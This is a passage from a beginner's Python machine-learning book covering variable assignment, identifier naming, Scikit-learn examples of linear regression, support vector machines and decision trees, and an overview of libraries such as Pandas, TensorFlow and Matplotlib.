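The three types above can be seen directly in the interpreter; the variable names here are illustrative, and the built-in type() function reports which kind of value each one holds:

```python
pi = 3.14            # float: a number with a decimal point
name = "John Doe"    # string: text inside quotation marks
count = 7            # whole number (integer): no decimal point

# type() reports which kind of value each variable holds
print(type(pi), type(name), type(count))
```

Running this prints the three class names (float, str, and int), which is a handy way to check what kind of value a variable is storing.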
When you are trying to work with the variables in your program, you won’t
have to go through and make a declaration to make sure the memory space is
available. This is something that Python can do for you automatically, as
soon as a value is assigned to a variable. If you would like to make sure that
this is happening in your code and avoid some of the surprises along the way,
you need to double-check that the equal sign (the sign that assigns a value
to a variable) is in the right place. An excellent example of how this
looks when you write out code includes the following:
x = 12  # this is an example of an integer assignment
pi = 3.14  # this is an example of a floating-point assignment
customer_name = "John Doe"  # this is an example of a string assignment
In some instances, you may need to have one variable with two or more
values attached to it. There are certain times when you won’t be able to avoid
this and need to make it happen. The good news is that you can work with the
same procedure discussed above to make this happen; you just need to make
sure that there is an equal sign between each part so that the compiler
knows how to
assign everything. So, when you want to do this, you would want to write out
something like a = b = c = 1.
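That chained assignment can be tried directly; the second form below (assigning several different values at once) is an extra Python feature mentioned here for illustration, not something from the original text:

```python
# Chained assignment gives the same value to several variables at once:
a = b = c = 1
print(a, b, c)   # 1 1 1

# Python can also assign different values to several variables in one line:
x, pi, name = 12, 3.14, "John Doe"
print(x, pi, name)
```

After the first line, all three variables point at the value 1, so changing one later does not affect the others.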
The Keywords
Any time that you are using the Python language, like what we find in other
coding languages as well, you are going to come across some words that are
reserved as commands in the code, and these are going to be known as
keywords. You need to be careful about the way you use these because they
are there to tell the program some commands, and how you would like it to
behave. You don't want to use these words anywhere outside of their
particular command, such as for variable names.
If you do misuse these keywords, it is going to cause some confusion inside
the code. The interpreter isn’t going to know what to do, and the computer
may get stalled in what it needs to do. As we go through this guidebook some
more and develop a few Python codes for machine learning, we will start to
recognize some of the most common keywords that you need to watch out
for.
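Python itself can tell you exactly which words are reserved. The standard-library keyword module (shown here as a quick reference, not something required by the text) lists them all:

```python
# The keyword module lists the reserved words for the running Python version.
import keyword

print(keyword.kwlist)              # every reserved word, e.g. 'if', 'for', 'class'
print(keyword.iskeyword("for"))    # True: 'for' is reserved
print(keyword.iskeyword("total"))  # False: fine to use as a variable name
```

Checking a name with keyword.iskeyword() before using it is an easy way to avoid the confusion described above.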
Naming Your Identifiers
The next thing that we need to focus on is how to name all of the identifiers.
You need to do this in a way that makes sense, and will not confuse the
computer along the way. Any time that you are writing out a particular code
in Python, you are going to have at least a few identifiers that show up. Some
of the most common of these identifiers are going to include classes,
entities, variables, and functions.
At one point or another, you will need to name out the identifiers so that they
are more likely to work in the way that they should and make it easier for the
compiler to pull them up when it is time to execute the code. No matter
which of the four identifiers that you use, the rules for naming are going to be
the same, which can make it easier when you get started. Some of the rules
you should remember when naming your identifiers include:
Any time that you are using letters, it is fine to use either upper case or
lower case, and a combination of both is fine as well. You can also add in
numbers and an underscore to the name, but no other symbols. Any
combination of these is acceptable; just make sure that there are no spaces
between the characters of the name.
Never start the name of one of your identifiers with a number. This means
that writing out the name of 4babies would result in an error on your
computer. However, it is acceptable to name an identifier “fourbabies” if you
would like.
The identifier should never be one of the Python keywords, and the keyword
should not appear in the name at all.
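The naming rules above can be tested directly in the interpreter; the names below are invented examples, chosen only to show one legal and one illegal form of each rule:

```python
# Names that follow the rules:
four_babies = 4      # letters and an underscore
fourBabies = 4       # mixed upper and lower case is fine
answer2 = 42         # digits are allowed after the first character

# Names that break the rules (uncommenting either line raises a SyntaxError):
# 4babies = 4        # starts with a number
# customer name = 1  # contains a space

print(four_babies, fourBabies, answer2)
```

Note that four_babies and fourBabies are two different variables, since Python treats upper and lower case letters as distinct.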
Now, if you are trying to go through and write out a few of your codes along
the way, and you don’t follow all of the rules that are above, you will confuse
the compiler, and it will send you an error message to let you know
something is wrong. The error will then be on your computer, and the
program will close out because it doesn’t know how to proceed. This is
something that you don’t want to happen, so be careful when naming these
identifiers.
Another thing to remember with these identifiers and naming them is that you
want to make sure that you are picking out names that are easy for you to
remember. And picking out names that are easy to understand and read will
make it easier if another programmer comes in, and is trying to look through
the code as well.
What Else Do I Need to Know About the Python Coding Language?
The Python coding language is often considered to be one of the best
languages for programming by the experts, and this is even truer if you are
someone who has never worked with coding in the past. This language is
simple, it has plenty of power, and there are a lot of the tools and the
resources that are needed to help you work on your project, even if that
project has to do with machine learning. While there are other options that
you can use with machine learning, those are often a bit more difficult to
work with, and Python is often the better choice.
One thing that you will like when you first start working with the Python
language is that the whole thing is based on the English language. What this
means is that you will recognize the words and what they mean, rather than
trying to guess. And even though it is a language that is great for beginners
who have never worked with coding before, it is going to be strong enough to
work with machine learning and any other topic that you would like.
As someone ready to learn and get started with the Python language, you will
notice that it has a nice big library available that you can utilize when you are
coding. And this library is going to have the tools and the resources that you
need, making it easier for beginners and experts alike to write out any code
that they need.
Chapter 8 Machine Learning Algorithms
Now that you understand the concept of machine learning and you’ve
assembled all of your tools, it’s time to start exploring the most powerful
algorithms. Keep in mind that while you will learn about each algorithm and
technique individually, they are rarely used like this in a real world scenario.
When dealing with complex datasets you will often combine supervised
machine learning techniques with unsupervised machine learning techniques,
as well as a number of other processes.
In this chapter we are going to focus on a number of algorithms that work
well separately when working with ideal data sets, and even better when
combined to achieve high accuracy and efficiency. Some of the algorithms
we’ll explore include linear regression, decision trees, and support vector
machines.
Linear Regression
Many machine learning problems, such as prediction analysis, are handled
using linear regression. This technique is powerful in predicting an outcome
with high accuracy as long as the training data is valuable and doesn’t contain
too much noise. Keep in mind that this is why you need to perform data pre-
processing, to clear out some of the noise and outliers that can affect the
results.
One of the characteristics of linear regression is calculating the prediction
value based on independent variables. In other words, you should opt for this
algorithm whenever you have to calculate the link between a number of
variables. However, take note that linear regression can only handle
regression problems, and not classification problems. There are other
algorithms for that.
Now let’s see an example of how to apply linear regression using Scikit-
learn and an open source dataset. We will use the Scikit library because it
contains a number of machine learning specific algorithms, as well as certain
public datasets. One such dataset is the Boston housing market dataset, which
is well-documented and clean. In order to use linear regression efficiently, we
will divide the whole set into a training set (80%) and a testing set (20%).
Let’s get to work:
from sklearn.datasets import load_boston
boston = load_boston()
from sklearn.model_selection import train_test_split
X_train, X_test, Y_train, Y_test = train_test_split(boston.data,
boston.target, test_size=0.2, random_state=0)
As you can see, the Python code is easy to read and quite understandable
without much explanation. We have imported our dataset and have performed
a split in order to obtain a training set and a test set. The splitting function is a
perfect example of the tools that the Scikit-learn library contains. You will
notice that we have declared the percentages by stating the target test dataset
should have a value of 0.2. This means that it will contain 20% of the data.
Furthermore, we have a random state parameter which is needed to define the
value which will handle the random number generating during the split.
Basically, it randomly selects the data that will be categorized as training data
or testing data.
In the next phase, we need to apply a regressor in order for our linear
regression algorithm to make an accurate prediction. Once it’s implemented
all we need to do is measure the results to see how it performed. Keep in
mind that there are many factors that can influence the accuracy, such as
random errors, mislabeled data, outliers, noise, and so on. That is why the
pre-processing you perform is rarely enough, and you will have to apply
other algorithms to improve the result. This is something you need to keep in
mind for the near future when you practice on your own. Now let’s see our
regressor and the results we obtain:
In: from sklearn.linear_model import LinearRegression
regression = LinearRegression()
regression.fit(X_train, Y_train)
Y_pred = regression.predict(X_test)
from sklearn.metrics import mean_absolute_error
print ("MAE", mean_absolute_error(Y_test, Y_pred))
Out: MAE 3.9318708224346
That’s it! As you can see linear regression is easy to implement as long as
you use Scikit-learn to lessen the burden. The result we obtained, however,
while not bad, is not exactly good either. It shows that even when we have
fairly clean data, there is always room for improvement with other algorithms
and techniques. Furthermore, whenever you have to make a choice between
machine learning algorithms, you will actually be balancing prediction
accuracy with speed. In essence, it comes down to those two factors.
Whenever you opt for one, the other one is sacrificed. With time and
experience you will learn how to balance them based on the type of data you
are working with and what kind of results you need to obtain.
Now, let’s see another type of algorithm, namely the support vector machine.

Support Vector Machines


If you need a versatile algorithm that can handle nearly everything for you,
then a support vector machine is precisely what you’re looking for. While the
linear regression algorithm is only used for regression problems, support
vector machines can handle both regression, as well as classification, and
even the detection of outliers. This technique is one of the foundational
algorithms every machine learner needs to study and learn how to implement.
Support vector machines are popular because they are powerful without
being resource intensive. Usually, the more you push for accuracy, the slower
the data processing will go because it will require more from your computer
system. However, support vector machines require a lot less power without
affecting the prediction accuracy. Furthermore, you can use this algorithm to
also clean most of the noise within the dataset, thus reducing the amount of
steps you need to perform during the pre-processing phase (though it’s still
advisable to perform all of them).
So why are support vector machines so important? Where are they used?
Because of their power and versatility they are implemented in a variety of
fields. For instance, they are used for facial recognition software, text
classification, handwriting recognition, and in the medical industry as well
for classifying genes. There are many more uses for this algorithm because it
separates the data points within the dataset with great efficiency and that
allows for accurate enough results to make it usable in complex applications.
We will go through an example to see how a support vector machine is
implemented and how it works. Keep in mind that you will again have to
make use of the Scikit-learn library in order to reduce the time it takes to
implement the algorithm. As you can see, this tool is irreplaceable whether
you’re interested in machine learning, data science, or even data mining.
With that being said, we will use a support vector machine in order to predict
how valid a banknote is. This implies image classification, and this algorithm
is ideal for this process. The algorithm implementation will be simple
because the classification will be binary. All we need to establish is whether a
banknote is authentic or fake, therefore true or false.
Take note that we will have a number of attributes that describe the banknote.
In addition, we need to establish the separation line between the two
dimensions in order to avoid any misclassifications. While other
classification algorithms can perform the same process, support vector
machines have a unique approach. This technique determines the decision
limit by calculating the maximum distance between certain data points that
are in close proximity to every single class. The decision limit needs to be
optimal and therefore we cannot just randomly select it. These optimal data
points are known as support vectors, hence the name of our algorithm. Keep
in mind that they are a mathematical concept and we will not dig too deep
into how they are calculated and so on. At this stage you don’t need to know
the core details that lie in fairly complex algebra.
Now, let’s see a practical example on how to apply a support vector machine
that does everything we discussed. For this demonstration you will need to
use several libraries and packages. Here’s the code:
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
dataset = pd.read_csv("bank_note.csv")
print(dataset.shape)
The shape function is used to extract some information about the dataset.
Namely, it tells us how many rows and columns we have. For the purpose of
this exercise we are interested only in the first 5 rows (out of over 1,300).
Now type the following line to see the result:
print (dataset.head())
   Variance  Skewness  Curtosis  Entropy  Class
0   3.62160    8.6661   -2.8073 -0.44699      0
1   4.54590    8.1674   -2.4586 -1.46210      0
2   3.86600   -2.6383    1.9242  0.10645      0
3   3.45660    9.5228   -4.0112 -3.59440      0
4   0.32924   -4.4552    4.5718 -0.98880      0
The columns represent the attributes, namely the variance, skewness, and so
on. Now we can start processing this information in order to start building
our training and testing sets. However, first we need labels:
x = dataset.drop('Class', axis=1)
y = dataset['Class']
The first command instructs the system to store every column into a variable.
The only exception is the class column and that is why we use the drop
function in order to drop it. The reason we did so is because we want to store
it separately in another variable, and that is what we do with the second
command. Now we have the dataset attributes inside “x” and the labels inside
“y”. This is the first processing step, separating the attributes from the labels.
The next phase involves the data separation in order to create our train and
test sets. Simply use the function you used earlier for linear regression to
perform this step, namely train_test_split. The breakdown should respect the
same ratio as before.
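Following that instruction, the split might look like the sketch below. The arrays here are random stand-ins for the banknote attributes and labels (not the real dataset), but the variable names x_train, x_test, y_train, and y_test match the ones the classifier uses later in this section:

```python
import numpy as np
from sklearn.model_selection import train_test_split

# Stand-in data: 100 rows of 4 attributes plus a binary class label,
# mimicking the shape of the banknote dataset.
rng = np.random.default_rng(0)
x = rng.random((100, 4))
y = rng.integers(0, 2, size=100)

# Same 80/20 ratio as in the linear regression example.
x_train, x_test, y_train, y_test = train_test_split(
    x, y, test_size=0.2, random_state=0)

print(x_train.shape, x_test.shape)  # (80, 4) (20, 4)
```

With the real dataset you would pass the x and y variables extracted from the CSV file instead of the random stand-ins.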
Next, we will train the support vector machine, however, first we need to
import it from the Scikit-learn library, otherwise we do not have any access to
the algorithm or any of its components. Let’s see the code:
from sklearn.svm import SVC
svc_classifier = SVC(kernel='linear')
svc_classifier.fit(x_train, y_train)
Now let’s see the prediction with the help of the test data:
pred_y = svc_classifier.predict(x_test)
We’re almost done. All we need to do now is to see how accurate the
prediction is. In the case of the support vector machine we will have to apply
what is known as a confusion matrix, which holds a number of metrics, such
as precision, recall, and a few others. While the name of the confusion matrix
might sound confusing, you should know that it is a basic table that contains
information about the performance of the data classification process. It will
list the positive and negative cases, as well as the false positive and negative
cases. These metrics are then used to establish the final accuracy result.
Here’s how it all looks in code:
from sklearn.metrics import confusion_matrix
print(confusion_matrix(y_test, pred_y))
This is how the results will look:
[[160   1]
 [  1 113]]
Accuracy Score: 0.99
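Note that confusion_matrix on its own does not print an accuracy score; the figure above is presumably computed with Scikit-learn's accuracy_score helper. A minimal sketch with small stand-in label lists (not the banknote predictions themselves):

```python
from sklearn.metrics import accuracy_score

# Stand-in labels; in the banknote example these would be
# y_test (true labels) and pred_y (predicted labels).
y_true = [0, 0, 1, 1, 1]
y_hat = [0, 0, 1, 1, 0]

# Fraction of predictions that match the true labels: 4 out of 5.
print("Accuracy Score:", accuracy_score(y_true, y_hat))  # 0.8
```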
Let’s also see the detailed report:
from sklearn.metrics import classification_report
print(classification_report(y_test, pred_y))
These are the final results:
             precision  recall  f1-score  support

        0.0       0.99    0.99      0.99      161
        1.0       0.99    0.99      0.99      114
avg / total       0.99    0.99      0.99      275
As you can see from these numbers, the support vector machine has
performed magnificently well because we managed to obtain a 0.99
accuracy value without applying any other algorithms or data-preprocessing
techniques. This is why support vector machines are used in so many
technical fields that require pin-point accuracy.
Next up, you are going to take a look at another powerful algorithm called a
decision tree.
Decision Trees
Decision trees, just like support vector machines, are incredibly versatile
because they can perform both regression and classification operations. This
means they are extremely useful when working with large datasets and you
should get acquainted with them. Furthermore, decision trees form the basis
of another type of machine learning algorithm known as an ensemble
method, particularly the one known as a random forest. It’s all fairly logical.
If you have a lot of decision trees they form a forest, right?
As the name suggests, decision trees are used to model decisions, including
the determination of any kind of consequences and system resources needed
for the entire process. In addition, everything is presented visually in a graph.
In other words, as a result you will have a flowchart that contains every test
you perform. For instance, let’s say you flip a coin a certain number of times.
Every time the results will be recorded and you will have a number of tree
branches that represent them, together with the leaves that represent class
labels.
This supervised machine learning algorithm is considered to be one of the
most powerful ones because it offers accurate results without sacrificing too
much efficiency or requiring too many resources from your system.
Furthermore, the graph system allows you to easily interpret the data and
therefore make adjustments as needed instead of going through another
tedious process that would achieve the same thing but with a lot more work.
With that being said, let’s discuss all the other advantages provided by
decision trees:

1. User-friendly: Unlike many other algorithms or techniques,
decision trees are logical even to those without significant
machine learning or mathematical knowledge and experience.
You don’t need to be a data scientist to start working with
them. They follow a simple, programming-like structure,
similar to Python’s conditional operations. A decision tree
follows the “if this, then do that, else do this” logic.
Furthermore, the results are clear and do not require even a
fundamental knowledge of statistics in order to interpret them.
That is the benefit of having an inbuilt graph that clearly
explains the data you are analyzing.
2. Clean data: Clean data yields accurate results. Therefore, no
matter which algorithm you use you always have to eliminate
as much noise and as many outliers as you can by using certain
methods and techniques. However, the benefit of using
decision trees is that they are barely affected by these factors.
Outliers and noise will only be a minor inconvenience and you
will often be able to ignore them completely and still achieve
an accurate result.
3. Versatile: As you already know, certain machine learning
algorithms are designed to work only with certain data types.
Some of them can only be applied to categorical data, while
others are specifically used on numerical data. Often for this
reason they need to be combined when working with complex
datasets that contain both types of information. However,
decision trees can handle the training process for both data
types, thereby significantly reducing your workload.
4. Exploring data: Data exploration is a valuable step that can be
time consuming because you need to identify the most valuable
data points and then establish a connection between them.
Decision trees, however, excel at exploratory analysis and you
will spend a lot less time performing this step. In addition, you
will be able to create new features a lot more efficiently in
order to boost the accuracy of the predictions even further.
Exploring data can be exhausting because in the real world you
will often deal with thousands of variables and finding the most
important ones can be difficult without the appropriate tool.
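The "if this, then do that, else do this" logic from the first point above can be sketched in plain Python. The thresholds below are illustrative hand-picked values, not ones learned from data, and the function name is hypothetical:

```python
def classify_iris(petal_length, petal_width):
    # A hand-written two-level decision tree over the Iris flower classes.
    # A real tree learns these split thresholds from the training data.
    if petal_length < 2.5:
        return "setosa"
    else:
        if petal_width < 1.8:
            return "versicolor"
        else:
            return "virginica"

print(classify_iris(1.4, 0.2))  # setosa
print(classify_iris(4.5, 1.5))  # versicolor
```

Each branch of the nested if/else corresponds to one internal node of the tree, and each return statement corresponds to a leaf.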
Now that you have an idea about decision trees and why they are a preferred
algorithm amongst machine learners, you should also learn which
disadvantages they bring. Keep in mind there is no such thing as the perfect
algorithm, so let’s see what kind of difficulties you will be facing when
working with decision trees:

1. Overfitting: This is probably the biggest problem you will face.
Decision trees tend to exaggerate and build overly complex
decision trees that can’t perform accurately on general data.
However, the issue of overfitting isn’t only found in this case.
Many algorithms have to deal with it. The easiest solution you
can deploy to limit the risk of overfitting is the application of
parameter limitations.
2. Categorization: When your data set has a large number of
continuous numerical variables, decision trees will encounter
difficulty when it comes to categorizing them. Information is
often lost during this process. Take note that continuous
variables are considered to be anything with a value that is
specifically defined between a certain minimum and maximum.
For instance, let’s say that we have some data which specifies
that only people between 21 and 45 can join the military. The
age variable is considered to be continuous because we have set
limits.
3. Picky algorithms: The algorithm doesn’t always choose the
most accurate and efficient decision tree from which you draw
your conclusion. This is simply the nature of the technique.
However, the solution is simple. All you need to do is train
multiple trees in order to sample a larger number of features
randomly and find the most accurate solution.
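The "parameter limitations" mentioned in the first point above correspond, in Scikit-learn, to constructor arguments such as max_depth and min_samples_leaf. A sketch using the library's built-in Iris dataset (the parameter values chosen here are illustrative):

```python
from sklearn.datasets import load_iris
from sklearn.tree import DecisionTreeClassifier

iris = load_iris()

# An unconstrained tree keeps splitting until every leaf is pure,
# which is where the overfitting risk comes from.
deep = DecisionTreeClassifier(random_state=0)
deep.fit(iris.data, iris.target)

# Capping the depth and the minimum leaf size limits how complex
# the tree is allowed to become.
shallow = DecisionTreeClassifier(max_depth=3, min_samples_leaf=5,
                                 random_state=0)
shallow.fit(iris.data, iris.target)

print(deep.get_depth(), shallow.get_depth())
```

The constrained tree can never grow past the depth limit, trading a little training accuracy for better behavior on general data.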
You learned earlier in this section that decision trees are used to perform
regression tasks, as well as classification tasks. However, this doesn’t mean
that you use the identical method for both tasks. You need to split the
decision trees into two different categories, namely the regression trees and
classification trees. The basics are still the same for both categories, however,
there are a number of differences you should be aware of:

1. Regression trees are specifically applied for tasks that involve
continuous dependent variables. At the same time classification
trees are needed when dealing with categorical dependent
variables.
2. The values that we extract as the result from the training data
are determined differently for each category of decision trees.
In the case of classification trees the value is calculated as the
mode value of the total observation. This means that if we have
an unknown data observation, we can predict with the help of
the mode value. Keep in mind that mode values are the values
that we find the most frequently in a given set of values. On the
other hand, regression trees extract the value from the training
data in the form of the mean of the total observations. This
mean value is then used to calculate any missing data
observations.
3. Regression and classification trees rely on binary splitting. This
concept involves going from the top of the tree to the bottom.
This means that when we have observations in one region of
the tree, there are a number of branches below it that are
divided. The division happens within the predictor space. This
concept is also often referred to as greedy because the
algorithm seeks the variable that is needed for the current split
that is being analyzed. The operation does not take any future
splits in consideration and that is why sometimes we don’t have
the most accurate results. This issue needs to be taken into
consideration in order to counteract its effects with various
methods and create a better decision tree.
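The mode/mean distinction from the second point above can be sketched with plain Python. The leaf observations below are made-up values chosen only to illustrate the two prediction rules:

```python
from statistics import mean, mode

# Training observations that ended up in the same leaf node.
leaf_classes = ["fake", "authentic", "authentic", "authentic"]  # classification
leaf_values = [21.0, 23.5, 22.0, 24.5]                          # regression

# A classification tree predicts the mode (most frequent value)
# of the leaf's observations...
print(mode(leaf_classes))  # authentic

# ...while a regression tree predicts their mean.
print(mean(leaf_values))  # 22.75
```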
Now let’s discuss more about the concept of splitting and see where it occurs.
Splitting directly affects the accuracy of the decision trees. This means that if
we are applying a number of algorithms on a decision tree, they will all affect
the way a data node is divided into a number of subnodes. At this time you
should keep in mind the differences between the two decision tree categories.
The subnodes that are created as a result of splitting will maintain some form
of uniformity. In addition, the node splitting is performed on every variable,
however only the most uniform subnodes are selected. This process involves
some mathematics and we will not dig deeper into the details. It’s enough to
understand the theory behind the process in order to start building the
decision trees. With that being said, let’s see how to work with them in an
application.
Decision Trees in Practice
In order to create the decision trees you need to start from the root node.
Once you access that data you can select a certain attribute and then perform
a logical test on it. As a result you will be able to branch out from the
outcome to any subsets of data that lead to a desirable result from a child
node. You will need to perform recursive splitting on these child nodes in
order to clean up the leaves and keep only the near-perfect ones. These leaves
will represent the data samples that come from the same class. In addition,
you might consider pruning the trees in order to eliminate the excess sub-
sections of the trees which do not lead to any boosts in accuracy. This is one
of the purposes of the splitting process. Once it is complete you can choose
the most optimal split and the most useful feature.
Now let’s finally stop with the theory and start looking at the practical
application. We are going to create a decision tree. For the purpose of this
demonstration we will need Scikit-learn once again because we will be using
another public dataset called Iris. Let’s start by importing everything you
need.
%matplotlib inline
import pandas as pd
import numpy as np
import seaborn as sns
import matplotlib.pyplot as plt
from sklearn.model_selection import train_test_split
from sklearn.tree import DecisionTreeClassifier
df = pd.read_csv('Iris.csv')
df.isnull().any()
After importing everything we have also performed a null value check with
the help of the last line. Once we determine that no values are absent we can
start examining the information. As always, the first step is learning about the
variables and values by reading a summary analysis of the dataset. Once you
know what you’re up against we can start looking at the connections between
the columns. To do this check we have imported the seaborn module because
it provides us with a tool called “pairplot”. This tool is in fact a function that
plots the connections and makes it much easier for us to visualise them. At
this point you can use a certain color for each column. For instance, you can
manipulate the hue for the species section in order to find any outliers in that
category. Here’s how you can do this with Python code:
sns.pairplot(df, hue='Species')
If you decided to use this particular dataset, you will notice that we do have a
number of outliers, but they aren’t dominating. They may be the result of
unknown anomalies or some faulty data that snuck in. Take note that these
datasets you are working with are extremely clean when compared to real
world data. Most data contains a great deal of noise and outliers and you have
to thoroughly clean them. For now, we can ignore the outliers because they
aren’t prevalent enough to disturb our results significantly.
The next step is to divide the dataset into a training and a test set with the
same method we used before. However, now that we’re working with
decision trees we will change the split to a 70 to 30 ratio instead of the usual
80 to 20. Let’s examine the code:
all_inputs = df[['SepalLengthCm', 'SepalWidthCm', 'PetalLengthCm',
'PetalWidthCm']].values
all_classes = df['Species'].values
(train_inputs, test_inputs, train_classes, test_classes) = train_test_split(
    all_inputs, all_classes, train_size=0.7, random_state=1)
You will notice that the random state parameter is now set to 1 instead of 0.
Because we fix this seed value, the split is performed identically no matter
how many times we perform it. This
way we will always be able to recreate the dataset if needed. Now let’s apply
the decision tree classifier:
dtc = DecisionTreeClassifier()
dtc.fit (train_inputs, train_classes)
dtc.score (test_inputs, test_classes)
The result should look something like this:
0.95555555
We have managed to obtain 95% accuracy, which is quite an excellent result
considering that we haven’t performed any cleaning and we decided to ignore
the outliers. This is why decision trees are so powerful and therefore popular
in training various models. You can achieve high accuracy without
performing too many operations.
Chapter 9 Essential Libraries for Machine
Learning in Python
Many developers nowadays prefer Python for their data analysis, and it is
applied not only to data analysis but also to statistical techniques.
Scientists, especially the ones dealing with data, also prefer using Python
for data integration, that is, connecting web apps with other production
environments.
The features of Python have helped scientists use it in Machine Learning.
Examples of these qualities include a consistent syntax, flexibility, and
shorter development times. Python can also express sophisticated models and
has engines that help with predictions.
As a result, Python boasts a set of very extensive libraries. Remember, a
library is a collection of routines and functions written in a given
language, so a robust library lets you tackle more complex tasks without
writing many lines of code from scratch. It is good to note that Machine
Learning relies heavily on mathematics: mathematical optimization, elements
of probability, and statistical data. Python's libraries therefore bring in
the rich machinery needed to perform complex tasks without much manual
involvement.
The following are examples of essential libraries in use today.
Scikit-Learn
Scikit-learn is one of the best known and most popular libraries in Machine
Learning. It supports many learning algorithms, both unsupervised and
supervised.
Examples of what Scikit-learn covers include the following:

k-means
decision trees
linear and logistic regression
clustering

This library builds on major components of NumPy and SciPy. Scikit-learn
adds sets of algorithms that are useful in Machine Learning and in tasks
related to data mining: it helps with classification, clustering, and
regression analysis. There are also other tasks that this library can
efficiently deliver, for example ensemble methods, feature selection, and
data transformation. Experts can also extend it, provided they are able to
implement the complex and sophisticated parts of the algorithms.
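Among the examples listed above, k-means clustering is the unsupervised one. A minimal sketch of how it might be used with Scikit-learn, on synthetic points chosen so that the two groups are obvious:

```python
import numpy as np
from sklearn.cluster import KMeans

# Two well-separated blobs of 2-D points; k-means should recover the groups.
points = np.array([[1.0, 1.0], [1.2, 0.8], [0.9, 1.1],
                   [8.0, 8.0], [8.2, 7.9], [7.8, 8.1]])

# Ask for two clusters; random_state fixes the seed for reproducibility.
km = KMeans(n_clusters=2, n_init=10, random_state=0)
km.fit(points)

# Each point is assigned a cluster label (0 or 1).
print(km.labels_)
print(km.cluster_centers_)
```

The cluster numbering (which blob gets label 0) is arbitrary, but the three points in each blob always share a label.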
TensorFlow
TensorFlow is a library for building and running deep learning algorithms.
Deep learning is not always necessary, but one good thing about it is its
ability to give correct results when done right. TensorFlow also lets you
run your computations on a CPU or a GPU: you write your program in Python,
compile it, and run it on your processor, which gives you an easy time
performing your analysis. There is no need to write these routines in C++
or at a lower level such as CUDA.
TensorFlow uses nodes, especially multi-layered ones. The nodes perform
several tasks within the system, including building artificial neural
networks, training them, and handling high volumes of data. Several
services, such as Google's search engine, depend on this library. One main
application is the identification of objects; it also helps in different
apps that deal with the recognition of voice.

Theano
Theano, too, forms a significant part of the Python library ecosystem. Its
vital task is to help with anything related to numerical computation, and it
is closely related to NumPy. It plays other roles such as:

Definition of mathematical expressions
Optimization of mathematical calculations
Evaluation of expressions related to numerical analysis

The main objective of Theano is to produce efficient results. It is a fast
Python library, able to perform calculations on intensive data up to 100
times faster than on a CPU alone; for this reason, Theano works best with a
GPU rather than a CPU. In most industries, engineers use Theano for deep
learning and for computing complex and sophisticated tasks, all made
possible by its processing speed. Due to the expansion of industries with a
high demand for data computation techniques, many people opt for the latest
version of this library, which was released a few years ago. That version,
1.0.0, brought several improvements, interface changes, and new features.
Pandas
Pandas is a very popular library that provides high-level, high-quality
data structures. The data structures are simple, easy to use, and intuitive.
Pandas is composed of various sophisticated built-in methods, which make it
capable of tasks such as grouping, timing analysis, combining data, and
filtering. Pandas can collect data from sources such as Excel, CSV files,
and even SQL databases, and it can manipulate the collected data to carry
out its operational roles. Pandas consists of two structures that enable it
to perform its functions correctly: Series, which is one-dimensional, and
DataFrames, which are two-dimensional. Pandas has been regarded as the
strongest and most powerful Python library for data manipulation, and it can
import and export a wide range of data. It is applicable in various sectors,
such as the field of Data Science.
Pandas is effective in the following areas:

Splitting of data
Merging of two or more types of data
Data aggregation
Selecting or subsetting data
Data reshaping

Diagrammatic explanations

A one-dimensional Series:

A    7
B    8
C    9
D    3
E    6
F    9

A two-dimensional DataFrame:

    A   B   C   D
0   0   0   0   0
1   7   8   9   3
2  14  16  18   6
3  21  24  27   9
4  28  32  36  12
5  35  40  45  15
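The two structures illustrated above can be built directly in code. A minimal sketch (the DataFrame values are generated to match the table, where each row is the base values scaled by the row number):

```python
import pandas as pd

# One-dimensional Series with a labelled index A..F.
s = pd.Series([7, 8, 9, 3, 6, 9], index=list("ABCDEF"))

# Two-dimensional DataFrame: column bases 7, 8, 9, 3 scaled by row number.
df = pd.DataFrame({col: [i * base for i in range(6)]
                   for col, base in zip("ABCD", [7, 8, 9, 3])})

print(s["C"])          # 9
print(df.loc[2, "B"])  # 16
```

Label-based access with s["C"] and df.loc[row, column] is the basic way of reading individual entries from both structures.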

Applying pandas in a real-life situation will enable you to perform the
following:

Quickly delete columns, or add new ones, within the DataFrame
Convert data from one form to another
Recover misplaced or missing data
Group data according to its functionality
Matplotlib
This is another sophisticated and helpful library for data visualization.
Its main objective is to show where the business stands based on its various
inputs. You will realize that your production goals are meaningless when you
fail to share them with the different stakeholders; to perform this,
Matplotlib comes in handy with the types of computational analysis and plots
required. It has long been a preferred Python library among data scientists
because of its good-looking graphics and images, and many prefer it for
creating various graphs for data analysis. However, the technological world
keeps changing, with new advanced libraries flooding the industry.
Matplotlib is also flexible; because of this, you are capable of making any
of the graphs you may need, and it only requires a few commands to do so.
In this Python library you can create diverse graphs, charts of all kinds,
histograms, and scatterplots. You can make non-Cartesian charts too, using
the same principles.
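As a rough sketch of how a production chart like the one described in this section could be drawn, the code below builds a simple bar chart. The production figures and labels are hypothetical, not taken from any real dataset:

```python
import matplotlib
matplotlib.use("Agg")  # render off-screen; no display window needed
import matplotlib.pyplot as plt

years = ["Year 1", "Year 2", "Year 3"]
fruit_output = [120, 150, 130]  # hypothetical production figures

fig, ax = plt.subplots()
ax.bar(years, fruit_output)
ax.set_title("Fruit production per year")
ax.set_ylabel("Units produced")

# Matplotlib can export the figure to image formats such as PNG or PDF.
fig.savefig("production.png")
```

Swapping ax.bar for ax.plot, ax.scatter, ax.hist, or ax.pie produces the other chart types listed below with essentially the same few commands.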

Diagrammatic explanations

[Figure: bar chart comparing a company's production of several product
categories over three years]
The above graph highlights the overall production of a company over three
years and demonstrates the use of Matplotlib in data analysis. By looking at
the diagram, you will realize that production in one year was high compared
to the other two. Again, the company tends to perform well in the production
of fruits, since fruit was leading in both years 1 and 2, with a tie in year
3. From the figure, you realize that your work of presentation,
representation, and even analysis has been made easier as a result of using
this library. This Python library will eventually enable you to come up with
good graphic images, accurate data, and much more; for example, it lets you
note the year in which your production was highest, putting you in a
position to maintain the high-productivity season.
It is good to note that this library can export graphics and can convert
them into formats such as PDF and GIF. In summary, the following tasks can
be undertaken with much ease:

Formation of line plots
Creation of scatter plots
Creation of bar charts and histograms
Application of various pie charts
Stem plots for data analysis and computation
Contour plots
Spectrograms
Quiver plot creation
Seaborn
Seaborn is also among the popular Python libraries. Its main objective is to
help with visualization, and it builds its foundation on Matplotlib. Due to
its higher level, it is capable of generating various plots such as heat
maps, violin plots, and time series plots.

Diagrammatic Illustrations

[Figure: line graph comparing the performance of the company's machines
over time]
The above line graph shows the performance of the different machines the
company is using. From the diagram, you can deduce which machines the
company should keep using to get the maximum yield. On most occasions, this
kind of evaluation with the help of the Seaborn library will enable you to
estimate the exact capabilities of your different inputs. Again, this
information can serve as a reference when purchasing more machines. The
